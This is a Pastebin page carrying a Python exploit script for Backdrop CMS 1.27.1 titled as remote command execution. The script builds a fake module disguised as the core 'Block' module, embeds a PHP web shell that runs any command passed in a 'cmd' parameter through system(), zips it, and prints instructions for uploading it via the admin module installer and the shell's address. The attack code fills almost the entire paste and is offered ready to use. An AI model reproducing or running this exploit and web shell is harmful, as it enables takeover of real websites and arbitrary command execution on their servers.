API tools faq
paste
Advertisement
FlyFar

Backdrop CMS 1.27.1 - Remote Command Execution (RCE)

FlyFar
May 19th, 2024
699
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.38 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
  2. # Date: 04/27/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://backdropcms.org/
  5. # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip
  6. # Version: latest
  7. # Tested on: MacOS
  8.  
  9. import os
  10. import time
  11. import zipfile
  12.  
  13.  
  14.  
  15. def create_files():
  16. info_content = """
  17. type = module
  18. name = Block
  19. description = Controls the visual building blocks a page is constructed
  20. with. Blocks are boxes of content rendered into an area, or region, of a
  21. web page.
  22. package = Layouts
  23. tags[] = Blocks
  24. tags[] = Site Architecture
  25. version = BACKDROP_VERSION
  26. backdrop = 1.x
  27.  
  28. configure = admin/structure/block
  29.  
  30. ; Added by Backdrop CMS packaging script on 2024-03-07
  31. project = backdrop
  32. version = 1.27.1
  33. timestamp = 1709862662
  34. """
  35. shell_info_path = "shell/shell.info"
  36. os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü
  37. oluşturur
  38. with open(shell_info_path, "w") as file:
  39. file.write(info_content)
  40.  
  41. shell_content = """
  42. <html>
  43. <body>
  44. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  45. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  46. <input type="SUBMIT" value="Execute">
  47. </form>
  48. <pre>
  49. <?php
  50. if(isset($_GET['cmd']))
  51. {
  52. system($_GET['cmd']);
  53. }
  54. ?>
  55. </pre>
  56. </body>
  57. </html>
  58. """
  59. shell_php_path = "shell/shell.php"
  60. with open(shell_php_path, "w") as file:
  61. file.write(shell_content)
  62.  
  63. return shell_info_path, shell_php_path
  64.  
  65. def create_zip(info_path, php_path):
  66. zip_filename = "shell.zip"
  67. with zipfile.ZipFile(zip_filename, 'w') as zipf:
  68. # Dosyaları shell klasörü altında sakla
  69. zipf.write(info_path, arcname='shell/shell.info')
  70. zipf.write(php_path, arcname='shell/shell.php')
  71. return zip_filename
  72.  
  73. def main(url):
  74. print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
  75. time.sleep(3)
  76.  
  77. print("Evil module generating...")
  78. time.sleep(2)
  79.  
  80. info_path, php_path = create_files()
  81. zip_filename = create_zip(info_path, php_path)
  82.  
  83. print("Evil module generated!", zip_filename)
  84. time.sleep(2)
  85.  
  86. print("Go to " + url + "/admin/modules/install and upload the " +
  87. zip_filename + " for Manual Installation.")
  88. time.sleep(2)
  89.  
  90. print("Your shell address:", url + "/modules/shell/shell.php")
  91.  
  92. if __name__ == "__main__":
  93. import sys
  94. if len(sys.argv) < 2:
  95. print("Usage: python script.py [url]")
  96. else:
  97. main(sys.argv[1])
  98.            
Tags: Exploit Vulnerability RCE kgjikimrkmcve Backdrop CMS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!